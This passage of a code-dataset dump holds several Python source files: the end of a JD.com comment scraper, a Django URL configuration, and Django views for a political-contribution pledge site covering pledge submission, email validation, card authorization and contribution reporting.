except Exception as e:\n print('erro', e)\n\nif __name__ == '__main__':\n url = 'https://club.jd.com/comment/productPageComments.action?'\n for i in range(10):\n get_html(url, i)","sub_path":"requests_spider.py","file_name":"requests_spider.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499753026","text":"from django.conf import settings\nfrom django.conf.urls import include, patterns, url\nfrom django.contrib import admin\nfrom django.contrib.sites.models import Site\nfrom www.views.auth import login, logout\nfrom www.views.main import index, test, support, ajax_contact, documentation, demo, signup\nfrom www.views.site import site\nfrom www.views.sites import sites, site_create, site_update, user, visits\nfrom api import urls as api_urls\n\n\nadmin.autodiscover()\nadmin.site.unregister(Site)\n\nurlpatterns = patterns('',\n url(r'^$', index, name='index'),\n url(r'^login/$', login, name='login'),\n url(r'^logout/$', logout, name='logout'),\n url(r'^demo/$', demo, name='demo'),\n url(r'^signup/$', signup, name='signup'),\n url(r'^sites/$', sites, name='sites'),\n url(r'^sites/new/$', site_create, name='site_create'),\n url(r'^sites/(?P\\w+)/edit/$', site_update, name='site_update'),\n url(r'^sites/(?P\\w+)/$', site, name='site'),\n url(r'^sites/(?P\\w+)/(?P\\w+)/$', user, name='user'),\n url(r'^sites/(?P\\w+)/(?P\\w+)/(?P\\w+)/$', visits, name='visits'),\n url(r'^ajax/contact/$', ajax_contact, name='ajax_contact'),\n url(r'^test/$', test, name='test'),\n url(r'^support/$', support, name='support'),\n url(r'^documentation/$', documentation, name='documentation'),\n url(r'^api/', include(api_urls)),\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# Serve assets for now.\nurlpatterns += patterns('',\n (r'^assets/(?P.*)$', 'django.views.static.serve', {\n \t'document_root': settings.STATIC_ROOT\n }),\n)\n\nurlpatterns += patterns('',\n url(r'^robots\\.txt$', 'django.views.static.serve', {\n 'path': 'assets/robots.txt',\n 'document_root': settings.WWW_ROOT,\n }),\n url(r'^favicon\\.ico$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': 
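The alignment logic documented in steps 5-5 through 5-7 of the stacking script above reduces to: locate the row of minimum `distance`, read its time, and subtract. A toy pandas sketch of just that core (column names follow the script; the sample values are invented for illustration):

import pandas as pd

df = pd.DataFrame({
    "time": [0, 10, 20, 30, 40],
    "distance": [500, 320, 150, 280, 450],
})

# idxmin() finds the closest approach directly, avoiding the script's
# list()/index() round trip.
min_index = df["distance"].idxmin()
base_time = df.loc[min_index, "time"]

# Shift all times so the closest approach sits at t = 0.
df["adjusted_time"] = df["time"] - base_time
print(df)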
settings.WWW_ROOT,\n }),\n url(r'^apple-touch-icon\\.png$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': settings.WWW_ROOT,\n }),\n url(r'^apple-touch-icon-precomposed\\.png$', 'django.views.static.serve', {\n 'path': 'assets/img/apple-touch-icon.png',\n 'document_root': settings.WWW_ROOT,\n }),\n)","sub_path":"www/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"551772208","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie\nfrom django.db import transaction\nfrom django.db.models import Q, Count\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404\nfrom django.conf import settings\n\nfrom twostream.decorators import anonymous_view, user_view_for\n\nfrom contrib.models import Trigger, TriggerStatus, TriggerExecution, ContributorInfo, Pledge, PledgeStatus, PledgeExecution, PledgeExecutionProblem, Contribution, ActorParty, IncompletePledge, TriggerCustomization\nfrom contrib.utils import json_response\nfrom contrib.bizlogic import HumanReadableValidationError, run_authorization_test\n\nimport copy\nimport rtyaml\nimport random\nimport decimal\n\ndef get_user_pledges(user, request):\n\t# Returns the Pledges that a user owns as a QuerySet.\n\t# (A simple \"|\" of QuerySets is easier to construct but it creates a UNION\n\t# that then requires a DISTINCT which in Postgres is incompatible with\n\t# SELECT FOR UPDATE. So we form a proper 'WHERE x OR y' clause.)\n\t\n\tfilters = Q(id=-99999) # a dummy filter that excludes everything, in case no other filters apply\n\n\tif user and user.is_authenticated():\n\t\tfilters |= Q(user=user)\n\n\tanon_user = request.session.get(\"anonymous-user\")\n\tif anon_user is not None:\n\t\tfilters |= Q(anon_user_id=anon_user)\n\n\treturn Pledge.objects.filter(filters)\n\n\n@require_http_methods(['POST'])\n@ensure_csrf_cookie\n@json_response\ndef get_user_defaults(request):\n\t# A user is in the process of making a pledge and wants to log in.\n\t# Authenticate, log them in, and then return default values to\n\t# pre-populate fields like their name & address.\n\n\t# authenticate\n\tfrom itfsite.accounts import User\n\tfrom itfsite.betteruser import LoginException\n\ttry:\n\t\tuser = User.authenticate(request.POST['email'].strip(), request.POST['password'].strip())\n\texcept LoginException as e:\n\t\treturn { \"status\": \"NotValid\", \"message\": str(e) }\n\n\t# check that the user hasn't already done this\n\ttrigger = Trigger.objects.get(id=request.POST['trigger'])\n\tif trigger.pledges.filter(user=user).exists():\n\t\treturn { \"status\": \"AlreadyPledged\" }\n\n\t# login() resets the CSRF token. This might be redundant, but\n\t# @ensure_csrf_cookie ensures that we send that CSRF token in\n\t# the response (as a cookie). 
The twostream library will detect\n\t# the new token in the AJAX response.\n\tfrom django.contrib.auth import login\n\tlogin(request, user)\n\n\t# Return the user's past contributor information to pre-populate fields.\n\treturn get_recent_pledge_defaults(user, request)\n\ndef get_recent_pledge_defaults(user, request):\n\t# Return a dictionary of information submitted with the user's most recent pledge\n\t# so that we can pre-fill form fields.\n\n\tret = { }\n\n\t# Get the user's most recent Pledge. If the user has no Pledges,\n\t# just return the empty dict.\n\tpledges = get_user_pledges(user, request)\n\tpledge = pledges.order_by('-created').first()\n\tif not pledge:\n\t\treturn ret\n\n\t# How many open pledges does this user already have?\n\tret['open_pledges'] = pledges.filter(status=PledgeStatus.Open).count()\n\n\t# Copy Pledge fields.\n\tret['emailEmail'] = pledge.get_email()\n\tfor field in ('amount', 'incumb_challgr', 'filter_party', 'filter_competitive'):\n\t\tret[field] = getattr(pledge, field)\n\t\tif type(ret[field]).__name__ == \"Decimal\":\n\t\t\tret[field] = float(ret[field])\n\t\telif isinstance(ret[field], ActorParty):\n\t\t\tret[field] = str(ret[field])\n\n\t# Copy contributor fields from the profile's extra dict.\n\tfor field in ('contribNameFirst', 'contribNameLast', 'contribAddress', 'contribCity', 'contribState', 'contribZip',\n\t\t'contribOccupation', 'contribEmployer'):\n\t\tret[field] = pledge.profile.extra['contributor'][field]\n\n\t# Return a summary of billing info to show how we would bill.\n\tret['cclastfour'] = pledge.profile.cclastfour\n\n\t# And indicate which pledge we're sourcing this from so that in\n\t# the submit view we can retreive it again without having to\n\t# pass it back from the (untrusted) client.\n\tret['from_pledge'] = pledge.id\n\n\treturn ret\n\n# Validates the email address a new user is providing during\n# the pledge (user says they have no password). Returns \"OK\"\n# or a human-readable error message about the email address\n# not being valid.\n#\n# Also record every email address users enter so we can follow-up\n# if the user did not finish the pledge form.\n@csrf_exempt # for testing via curl\n@require_http_methods([\"POST\"])\ndef validate_email(request):\n\tfrom itfsite.models import User, Campaign\n\tfrom email_validator import validate_email, EmailNotValidError\n\n\temail = request.POST['email'].strip()\n\n\t# Validate the email address. If it is invalid, return the\n\t# error message. 
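The `Q`-composition in `get_user_pledges` above is the key trick: OR-ing `Q` objects yields a single `WHERE x OR y` query, while OR-ing whole querysets can produce a UNION that needs DISTINCT, which Postgres refuses to combine with `SELECT FOR UPDATE`. The pattern in isolation, against the same `Pledge` model (note `is_authenticated` is a method call in the older Django used here, a property in current Django):

from django.db.models import Q

def pledges_for(user, anon_user_id):
    # Start from an always-false filter so that an empty identity still
    # yields a valid, empty queryset rather than all rows.
    filters = Q(id=-99999)
    if user is not None and user.is_authenticated:
        filters |= Q(user=user)
    if anon_user_id is not None:
        filters |= Q(anon_user_id=anon_user_id)
    # One WHERE clause; .select_for_update() can still be chained later.
    return Pledge.objects.filter(filters)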
See create_pledge below - we repeat this\n\t# as server-side validation again.\n\ttry:\n\t\t\t # DE does not accept internationalized addresses\n\t\t\t # during testing, don't check deliverability so that tests can operate off-line\n\t\tvalidate_email(email, allow_smtputf8=False, check_deliverability=settings.VALIDATE_EMAIL_DELIVERABILITY)\n\texcept EmailNotValidError as e:\n\t\treturn HttpResponse(str(e), content_type=\"text/plain\")\n\n\tif not User.objects.filter(email=email).exists():\n\t\t# Store for later, if this is not a user already with an account.\n\t\t# We store a max of one per email address.\n\t\tIncompletePledge.objects.get_or_create(\n\t\t\temail=email,\n\t\t\tdefaults={\n\t\t\t\t\"trigger\": Trigger.objects.get(id=request.POST['trigger']),\n\t\t\t\t\"via_campaign\": Campaign.objects.get(id=request.POST['via_campaign']),\n\t\t\t\t\"extra\": {\n\t\t\t\t\t\"desired_outcome\": request.POST['desired_outcome'],\n\t\t\t\t\t\"ref_code\": get_sanitized_ref_code(request),\n\t\t\t\t}\n\t\t\t})\n\n\treturn HttpResponse(\"OK\", content_type=\"text/plain\")\n\n@require_http_methods(['POST'])\n@json_response\ndef submit(request):\n\ttry:\n\t\t# Create an un-saved Pledge instance. If the user is anonymous,\n\t\t# it may create an AnonymousUser instance and associate with the\n\t\t# user's session.\n\t\tp = create_pledge_object(request)\n\n\t\t# If the Trigger is executed, validate that there are going\n\t\t# to be any recipients.\n\t\tif p.trigger.status == TriggerStatus.Executed:\n\t\t\tfrom contrib.bizlogic import get_pledge_recipients\n\t\t\tif len(get_pledge_recipients(p)) == 0:\n\t\t\t\treturn { "status": "error", "message": "The filters you chose have eliminated all possible recipients!" }\n\n\t\t# Get contributor info, save, and run a credit card\n\t\t# authorization.\n\t\tif not reuse_authorized_contributorinfo(p, request):\n\t\t\tsave_and_authorize_contributorinfo(p, request)\n\n\texcept HumanReadableValidationError as e:\n\t\treturn { "status": "error", "message": str(e) }\n\texcept AlreadyPledgedError as e:\n\t\treturn { "status": "already-pledged" }\n\n\t# If the Trigger has been executed and possibly other conditions are met, then we\n\t# can execute the Pledge immediately.\n\tif p.can_execute():\n\t\t# refresh the object - it's confused now because we pulled it\n\t\t# out of a transaction? lots of weird errors with Sqlite\n\t\tp = Pledge.objects.get(id=p.id)\n\t\tp.execute()\n\t\tp = Pledge.objects.get(id=p.id) # refresh again\n\n\t# If the user is anonymous...\n\tif not p.user:\n\t\t# The pledge needs to get confirmation of the user's email address,\n\t\t# which will lead to account creation. 
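The `IncompletePledge` call above shows the general shape of `get_or_create`: keyword arguments outside `defaults` form the lookup (here, at most one row per email), and `defaults` is applied only when the row is inserted. A generic sketch with a hypothetical `Reminder` model:

# `Reminder` is illustrative, not part of this codebase.
obj, created = Reminder.objects.get_or_create(
    email="user@example.com",        # lookup key: at most one row per email
    defaults={"note": "follow up"},  # used only if the row is inserted
)
if not created:
    pass  # row already existed; defaults were ignored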
We must do this after pledge\n\t\t# execution so that the email that is sent knows the status of the\n\t\t# pledge.\n\t\tp.anon_user.send_email_confirmation()\n\n\t\t# Wipe the IncompletePledge because the user finished the form.\n\t\tIncompletePledge.objects.filter(email=p.anon_user.email, trigger=p.trigger).delete()\n\n\t# Done.\n\treturn {\n\t\t\"status\": \"ok\",\n\t\t\"html\": render_pledge_template(request, p, p.via_campaign, response_page=True),\n\t}\n\ndef get_sanitized_ref_code(request):\n\tref_code = request.POST['ref_code']\n\tif ref_code is not None:\n\t\tif ref_code.strip().lower() in (\"\", \"none\"):\n\t\t\tref_code = None\n\treturn ref_code\n\n@transaction.atomic\ndef update_pledge_profiles(newest_pledge):\n\t# When a Pledge is created with new profile information, all\n\t# of the user's still-open Pledges are updated to use the new\n\t# profile.\n\n\t# Get all of the user's open pledges, excluding p.\n\tpledges = Pledge.objects\\\n\t\t.filter(status=PledgeStatus.Open)\\\n\t\t.exclude(id=newest_pledge.id)\n\tif newest_pledge.user:\n\t\tpledges = pledges.filter(user=newest_pledge.user)\n\telse:\n\t\tpledges = pledges.filter(anon_user=newest_pledge.anon_user)\n\n\t# Lock.\n\tpledges = pledges.select_for_update()\n\n\t# Get existing ContributorInfos on those pledges.\n\tprev_profiles = set(p.profile for p in pledges)\n\n\t# Update the open pledges to new profile.\n\tpledges.update(profile=newest_pledge.profile)\n\n\t# Delete any of the previous ContributorInfos that are no longer needed.\n\t# (Some may be used on non-open Pledges and cannot be deleted.)\n\tfor ci in prev_profiles:\n\t\tif ci.can_delete():\n\t\t\tci.delete()\n\nclass InvalidArgumentError(Exception):\n\tpass\n\nclass AlreadyPledgedError(Exception):\n\tdef __init__(self, existing_pledge):\n\t\tself.existing_pledge = existing_pledge\n\ndef create_pledge_object(request):\n\t# Creates an un-saved Pledge instance.\n\t#\n\t# Raises an AlreadyPledgedError if the user has already made a Pledge\n\t# for the specified Trigger.\n\n\tp = Pledge()\n\n\t# trigger\n\n\ttry:\n\t\tp.trigger = Trigger.objects.get(id=request.POST['trigger'])\n\texcept Trigger.DoesNotExist:\n\t\traise InvalidArgumentError(\"The trigger ID is invalid.\")\n\tif p.trigger.status == TriggerStatus.Draft:\n\t\traise InvalidArgumentError(\"This trigger is still a draft. A contribution cannot yet be made.\")\n\telif p.trigger.status not in (TriggerStatus.Open, TriggerStatus.Executed):\n\t\traise InvalidArgumentError(\"This trigger is in the wrong state to make a contribution.\")\n\n\tp.made_after_trigger_execution = (p.trigger.status == TriggerStatus.Executed)\n\n\t# ref_code (i.e. utm_campaign code) and Campaign ('via_campaign')\n\n\tfrom itfsite.models import Campaign, AnonymousUser\n\tp.ref_code = get_sanitized_ref_code(request)\n\tp.via_campaign = Campaign.objects.get(id=request.POST['via_campaign'])\n\n\t# user / anon_user\n\n\tif request.user.is_authenticated():\n\t\t# This is an authentiated user.\n\t\tp.user = request.user\n\t\texists_filters = { 'user': p.user }\n\n\telse:\n\t\t# This is an anonymous user.\n\t\temail = request.POST.get('email').strip()\n\n\t\t# If the user makes multiple actions anonymously, we'll associate\n\t\t# a single AnonymousUser instance with all of the Pledges.\n\t\tanon_user = AnonymousUser.objects.filter(id=request.session.get(\"anonymous-user\")).first()\n\t\tif anon_user and anon_user.email == email:\n\t\t\t# Reuse this AnonymousUser instance.\n\t\t\tp.anon_user = anon_user\n\t\telse:\n\t\t\t# Validate email. 
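`update_pledge_profiles` above is the standard lock-then-swap pattern: inside `@transaction.atomic`, `select_for_update()` row-locks the open pledges so a concurrent request cannot read a profile that is about to be garbage-collected. The skeleton with placeholder model names:

from django.db import transaction

@transaction.atomic
def swap_profile(owner, new_profile):
    # Row-lock the owner's open records until the transaction commits.
    rows = Record.objects.filter(owner=owner, open=True).select_for_update()
    old_profiles = set(r.profile for r in rows)
    rows.update(profile=new_profile)
    # Only now is it safe to delete profiles nothing references.
    for p in old_profiles:
        if p.can_delete():
            p.delete()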
See our function validate_email above.\n\t\t\tfrom email_validator import validate_email, EmailNotValidError\n\t\t\ttry:\n\t\t\t\tvalidate_email(email, allow_smtputf8=False, check_deliverability=settings.VALIDATE_EMAIL_DELIVERABILITY)\n\t\t\texcept EmailNotValidError as e:\n\t\t\t\traise HumanReadableValidationError(str(e))\n\n\t\t\t# Create a new AnonymousUser instance.\n\t\t\tp.anon_user = AnonymousUser.objects.create(email=email)\n\n\t\t\t# Record in the session so the user can reuse this instance and\n\t\t\t# to grant the user temporary (within the session cookie's session)\n\t\t\t# access to the resources the user creates while anonymous.\n\t\t\trequest.session['anonymous-user'] = p.anon_user.id\n\n\t\texists_filters = { 'anon_user': p.anon_user }\n\n\t# If the user has already made this pledge, it is probably a\n\t# synchronization problem. Just redirect to that pledge.\n\tp_exist = Pledge.objects.filter(trigger=p.trigger, **exists_filters).first()\n\tif p_exist is not None:\n\t\traise AlreadyPledgedError(p_exist)\n\n\t# Field values & validation.\n\n\tdef set_field(model_field, form_field, converter):\n\t\ttry:\n\t\t\tsetattr(p, model_field, converter(request.POST[form_field]))\n\t\texcept ValueError:\n\t\t\traise InvalidArgumentError(\"%s is out of range\" % form_field)\n\n\tset_field('algorithm', 'algorithm', int)\n\tset_field('desired_outcome', 'desired_outcome', int)\n\tset_field('incumb_challgr', 'incumb_challgr', int) # -1, 0, 1 --- but one day we want a slider so model field is a float\n\tset_field('amount', 'amount', decimal.Decimal)\n\tif request.POST.get(\"contribTipOrg\"):\n\t\tset_field('tip_to_campaign_owner', 'tip_amount', decimal.Decimal)\n\n\tif request.POST['filter_party'] in ('DR', 'RD'):\n\t\tp.filter_party = None # no filter\n\telse:\n\t\tp.filter_party = ActorParty.from_letter(request.POST['filter_party'])\n\n\t# Validation. Some are checked client side, so errors are internal\n\t# error conditions and not validation problems to show the user.\n\tif p.algorithm != Pledge.current_algorithm()[\"id\"]:\n\t\traise InvalidArgumentError(\"algorithm is out of range\")\n\tif not (0 <= p.desired_outcome < len(p.trigger.outcomes)):\n\t\traise InvalidArgumentError(\"desired_outcome is out of range\")\n\tif not (p.trigger.get_minimum_pledge() <= p.amount <= Pledge.current_algorithm()[\"max_contrib\"]):\n\t\traise InvalidArgumentError(\"amount is out of range\")\n\tif p.incumb_challgr not in (-1, 0, 1):\n\t\traise InvalidArgumentError(\"incumb_challgr is out of range\")\n\tif p.filter_party == ActorParty.Independent:\n\t\traise InvalidArgumentError(\"filter_party is out of range\")\n\tif p.tip_to_campaign_owner < 0:\n\t\traise InvalidArgumentError(\"tip_to_campaign_owner is out of range\")\n\tif p.tip_to_campaign_owner > 0 and (not p.via_campaign.owner or not p.via_campaign.owner.de_recip_id):\n\t\traise InvalidArgumentError(\"tip_to_campaign_owner cannot be non-zero\")\n\tif (p.trigger.trigger_type.extra or {}).get(\"monovalent\") and p.incumb_challgr != 0:\n\t\t# With a monovalent trigger, Actors only ever take outcome zero.\n\t\t# Therefore not all filters make sense. 
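The `set_field` helper above packages a converter-plus-error-translation idiom: each POST value runs through a type constructor (`int`, `decimal.Decimal`) and conversion failures become a uniform user-facing error, with range checks applied afterwards. A standalone sketch (also catching `decimal.InvalidOperation`, which `Decimal` raises instead of `ValueError`):

import decimal

class InvalidArgument(Exception):
    pass

def parse_field(post, name, converter):
    try:
        return converter(post[name])
    except (KeyError, ValueError, decimal.InvalidOperation):
        raise InvalidArgument("%s is missing or out of range" % name)

post = {"algorithm": "1", "amount": "25.00"}
algorithm = parse_field(post, "algorithm", int)
amount = parse_field(post, "amount", decimal.Decimal)
assert 0 < amount <= 500  # range checks follow conversion, as in the view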
A pledge cannot be filtered\n\t\t# to incumbents who take action 1 or to the opponents of actors\n\t\t# who do not take action 0.\n\t\traise InvalidArgumentError(\"monovalent triggers do not permit an incumbent/challenger filter\")\n\n\ttcust = TriggerCustomization.objects.filter(owner=p.via_campaign.owner, trigger=p.trigger).first()\n\tif tcust and tcust.incumb_challgr and p.incumb_challgr != tcust.incumb_challgr:\n\t\traise InvalidArgumentError(\"incumb_challgr is out of range (campaign customization)\")\n\tif tcust and tcust.filter_party and p.filter_party != tcust.filter_party:\n\t\traise InvalidArgumentError(\"filter_party is out of range (campaign customization)\")\n\n\tp.extra = { }\n\n\t# If the Trigger was a super-trigger, copy in the sub-triggers to the Pledge,\n\t# indicating the desired outcome of each sub-trigger through the outcome-map\n\t# on the Trigger.\n\tif p.trigger.extra and \"subtriggers\" in p.trigger.extra:\n\t\tp.extra[\"triggers\"] = [\n\t\t\t[rec[\"trigger\"], rec[\"outcome-map\"][p.desired_outcome]]\n\t\t\tfor rec\n\t\t\tin p.trigger.extra[\"subtriggers\"]\n\t\t]\n\n\treturn p\n\ndef save_and_authorize_contributorinfo(p, request):\n\t# Save the user's information to a ContributorInfo object, save the Pledge,\n\t# and run a credit card authorization to get a token that we can use to\n\t# make a charge later.\n\n\t# If the credit card authorization fails, roll back and don't save the Pledge\n\t# or the ContributorInfo.\n\twith transaction.atomic():\n\n\t\t# Create a new ContributorInfo record from the submitted info.\n\t\tcontribdata = { }\n\n\t\t# string fields that go straight into the extras dict.\n\t\tcontribdata['contributor'] = { }\n\t\tfor field in (\n\t\t\t'contribNameFirst', 'contribNameLast',\n\t\t\t'contribAddress', 'contribCity', 'contribState', 'contribZip',\n\t\t\t'contribOccupation', 'contribEmployer'):\n\t\t\tcontribdata['contributor'][field] = request.POST[field].strip()\n\t\t\t\n\t\t# Validate & store the billing fields.\n\t\t#\n\t\t# (Including the expiration date so that we can know that a\n\t\t# card has expired prior to using the DE token at a later time.)\n\t\tccnum = request.POST['billingCCNum'].replace(\" \", \"\").strip() # Stripe's javascript inserts spaces\n\t\tccexpmonth = int(request.POST['billingCCExpMonth'])\n\t\tccexpyear = int(request.POST['billingCCExpYear'])\n\t\tcccvc = request.POST['billingCCCVC'].strip()\n\t\tcontribdata['billing'] = {\n\t\t\t'cc_num': ccnum, # is hashed before going into database\n\t\t\t'cc_exp_month': ccexpmonth,\n\t\t\t'cc_exp_year': ccexpyear,\n\t\t}\n\n\t\t# Create a ContributorInfo instance. We need a saved instance\n\t\t# so we can assign it to the pledge (the profile field is NOT NULL).\n\t\t# It's saved again below.\n\t\tci = ContributorInfo.objects.create()\n\t\tci.set_from(contribdata)\n\n\t\t# Save. We need a Pledge ID to form an authorization test.\n\t\tp.profile = ci\n\t\tp.save()\n\n\t\t# If the user has other open pledges, update their profiles to the new\n\t\t# ContributorInfo instance --- i.e. 
update their contributor and payment\n\t\t# info.\n\t\tupdate_pledge_profiles(p)\n\n\t\t# For logging:\n\t\t# Add information from the HTTP request in case we need to\n\t\t# block IPs or something.\n\t\taux_data = {\n\t\t\t\"httprequest\": { k: request.META.get(k) for k in ('REMOTE_ADDR', 'REQUEST_URI', 'HTTP_USER_AGENT') },\n\t\t}\n\n\t\t# Perform an authorization test on the credit card and store some CC\n\t\t# details in the ContributorInfo object.\n\t\t#\n\t\t# This may raise all sorts of exceptions, which will cause the database\n\t\t# transaction to roll back. A HumanReadableValidationError will be caught\n\t\t# in the calling function and shown to the user. Other exceptions will\n\t\t# just generate generic unhandled error messages.\n\t\t#\n\t\t# Note that any exception after this point is okay because the authorization\n\t\t# will expire on its own anyway.\n\t\trun_authorization_test(p, ccnum, cccvc, aux_data)\n\n\t\t# Re-save the ContributorInfo instance now that it has the CC token.\n\t\tci.save(override_immutable_check=True)\n\ndef reuse_authorized_contributorinfo(p, request):\n\t# See if the user wants to re-use an existing ContributorInfo that\n\t# has a credit card token already in it that we can use.\n\tif not request.POST[\"copyFromPledge\"]:\n\t\treturn False\n\n\telse:\n\t\t# This is a returning user and we are re-using info from a previous pledge.\n\t\t# That pledge might be one that hasn't had its email address confirmed yet,\n\t\t# or if it has the user might not be logged in, but the user's session cookie\n\t\t# may grant the user access to it. Or if the user is logged in, it might be\n\t\t# a pledge tied to the account.\n\t\tprev_p = Pledge.objects.get(id=request.POST[\"copyFromPledge\"])\n\t\tif not get_user_pledges(p.user, request).filter(id=prev_p.id).exists():\n\t\t\traise InvalidArgumentError(\"copyFromPledge is set to a pledge ID that the user did not create or is no longer stored in their session.\")\n\t\tp.profile = prev_p.profile\n\t\tp.save()\n\t\treturn True\n\n@json_response\ndef cancel_pledge(request):\n\t# Get the pledge. 
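`save_and_authorize_contributorinfo` above leans on one property of `transaction.atomic`: an exception raised anywhere in the block, including by the external card-authorization call, rolls back every row written earlier in it. Stripped to its shape (the `Profile` model is a placeholder; `run_authorization_test` is the real helper from this module):

from django.db import transaction

def save_then_authorize(pledge, ccnum, cccvc, aux_data):
    with transaction.atomic():
        profile = Profile.objects.create()   # written first...
        pledge.profile = profile
        pledge.save()
        # ...but rolled back automatically if this raises; the card
        # authorization itself simply expires on its own, as the
        # original comments note.
        run_authorization_test(pledge, ccnum, cccvc, aux_data)
        profile.save()                       # persist the returned token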
Check authorization.\n\tp = Pledge.objects.get(id=request.POST['pledge'])\n\tif get_user_pledges(request.user, request).filter(id=p.id).exists():\n\t\ttry:\n\t\t\tp.delete()\n\t\texcept Exception as e:\n\t\t\treturn { \"status\": \"error\", \"message\": \"Could not cancel pledge: \" + str(e) }\n\t\treturn { \"status\": \"ok\" }\n\telse:\n\t\treturn { \"status\": \"error\", \"message\": \"You don't own that pledge.\" }\n\ndef render_pledge_template(request, pledge, campaign, show_long_title=False, response_page=False):\n\t# Get the user's pledges, if any, on any trigger tied to this campaign.\n\timport django.template\n\ttemplate = django.template.loader.get_template(\"contrib/contrib.html\")\n\t\n\tctx = {\n\t\t\"response_page\": response_page,\n\t\t\"show_long_title\": show_long_title,\n\t\t\"pledge\": pledge,\n\t\t\"campaign\": campaign,\n\t\t\"execution\": PledgeExecution.objects.filter(pledge=pledge).first(),\n\t\t\"contribs\": sorted(Contribution.objects.filter(pledge_execution__pledge=pledge).select_related(\"action\", \"recipient\"), key=lambda c : (c.recipient_type.value, c.action.name_sort)),\n\t\t\"share_url\": request.build_absolute_uri(pledge.via_campaign.get_short_url()),\n\t}\n\n\tfrom itfsite.middleware import get_branding\n\tctx.update(get_branding(request))\n\t\n\treturn template.render(ctx)\n\n@anonymous_view\ndef report(request):\n\tcontext = { }\n\tcontext.update(report_fetch_data(None, None))\n\treturn render(request, \"contrib/totals.html\", context)\n\ndef report_fetch_data(trigger, via_campaign):\n\tpledge_slice_fields = { }\n\tpledgeexec_slice_fields = { }\n\tca_slice_fields = { }\n\n\tif trigger:\n\t\tpledge_slice_fields[\"trigger\"] = trigger\n\t\ttry:\n\t\t\tte = trigger.execution\n\t\texcept TriggerExecution.DoesNotExist:\n\t\t\traise Http404(\"This trigger is not executed.\")\n\t\tif te.pledge_count_with_contribs == 0:\n\t\t\traise Http404(\"This trigger did not have any contributions.\")\n\t\tif te.pledge_count < .75 * trigger.pledge_count:\n\t\t\traise Http404(\"This trigger is still being executed.\")\n\t\tpledgeexec_slice_fields[\"trigger_execution\"] = te\n\t\tca_slice_fields[\"pledge_execution__trigger_execution\"] = te\n\n\tif via_campaign:\n\t\tpledge_slice_fields[\"via_campaign\"] = via_campaign\n\t\tpledgeexec_slice_fields[\"pledge__via_campaign\"] = via_campaign\n\t\tca_slice_fields[\"pledge_execution__pledge__via_campaign\"] = via_campaign\n\n\t# form response\n\tret = { }\n\n\t# number of pledges & users making pledges\n\tpledges = Pledge.objects.filter(**pledge_slice_fields)\n\tret[\"users_pledging\"] = pledges.exclude(user=None).values(\"user\").distinct().count()\n\tret[\"users_pledging_twice\"] = pledges.exclude(user=None).values(\"user\").annotate(count=Count('id')).filter(count__gt=1).count()\n\tret[\"pledges\"] = pledges.count()\n\tret[\"pledges_confirmed\"] = pledges.exclude(user=None).count()\n\tfrom django.db.models import Sum\n\tret[\"pledge_aggregate\"] = pledges.aggregate(amount=Sum('amount'))[\"amount\"]\n\n\t# number of executed pledges and users with executed pledges\n\tpledge_executions = PledgeExecution.objects.filter(problem=PledgeExecutionProblem.NoProblem, **pledgeexec_slice_fields)\n\tret[\"users\"] = pledge_executions.values(\"pledge__user\").distinct().count()\n\tret[\"num_triggers\"] = pledge_executions.values(\"trigger_execution\").distinct().count()\n\tif ret[\"num_triggers\"] > 0:\n\t\tret[\"first_contrib_date\"] = pledge_executions.order_by('created').first().created\n\t\tret[\"last_contrib_date\"] = 
pledge_executions.order_by('created').last().created\n\n\t# aggregate count and amount of campaign contributions\n\tret[\"total\"] = dict(zip([\"count\", \"total\"], Contribution.aggregate(**ca_slice_fields)))\n\tif ret[\"total\"][\"count\"] > 0:\n\t\tret[\"total\"][\"average\"] = ret[\"total\"][\"total\"] / ret[\"total\"][\"count\"]\n\n\tif trigger:\n\t\t# Aggregates by outcome. Return in the same order as Trigger.outcomes\n\t\t# (don't change that!).\n\t\tret['outcomes'] = []\n\t\toutcome_totals = dict(Contribution.aggregate('desired_outcome', **ca_slice_fields))\n\t\tfor outcome_index, outcome_info in enumerate(trigger.outcomes):\n\t\t\toutcome_total = outcome_totals.get((outcome_index,), (0, decimal.Decimal(0)))\n\t\t\tret['outcomes'].append({\n\t\t\t\t\"outcome\": outcome_index,\n\t\t\t\t\"label\": outcome_info['label'],\n\t\t\t\t\"total\": outcome_total[1],\n\t\t\t\t\"count\": outcome_total[0],\n\t\t\t})\n\n\t# Aggregates by actor.\n\tfrom collections import defaultdict\n\tret['actors'] = defaultdict(lambda : defaultdict( lambda : decimal.Decimal(0) ))\n\tfor ((action_or_actor, recipient_type), (count, total)) in Contribution.aggregate('action' if trigger else \"actor\", 'recipient_type', **ca_slice_fields):\n\t\tactor = action_or_actor.actor if trigger else action_or_actor\n\t\tret['actors'][actor.id]['actor'] = actor\n\t\tret['actors'][actor.id][recipient_type.name] += total\n\t\tif trigger: ret['actors'][actor.id]['action'] = action_or_actor\n\tret['actors'] = sorted(ret['actors'].values(), key = lambda x : (-(x['Incumbent'] - x['GeneralChallenger']), -x['Incumbent'], x['actor'].name_sort))\n\n\t# Aggregates by incumbent/chalenger.\n\tret['by_recipient_type'] = [\n\t\t{\n\t\t\t\"recipient_type\": recipient_type.name,\n\t\t\t\"count\": count,\n\t\t\t\"total\": total,\n\t\t}\n\t\tfor ((recipient_type,), (count, total))\n\t\tin Contribution.aggregate('recipient_type', **ca_slice_fields) ]\n\n\t# Aggregates by party.\n\tret['by_party'] = defaultdict( lambda : [0, decimal.Decimal(0)] )\n\tfor ((recipient,), (count, total)) in Contribution.aggregate('recipient', **ca_slice_fields):\n\t\tret['by_party'][recipient.party][0] += count\n\t\tret['by_party'][recipient.party][1] += total\n\tret['by_party'] = [ { \"party\": party, \"count\": count, \"total\": total } for (party, (count, total)) in ret['by_party'].items() ]\n\tret['by_party'].sort(key = lambda item : item[\"total\"], reverse=True)\n\n\t# report\n\treturn 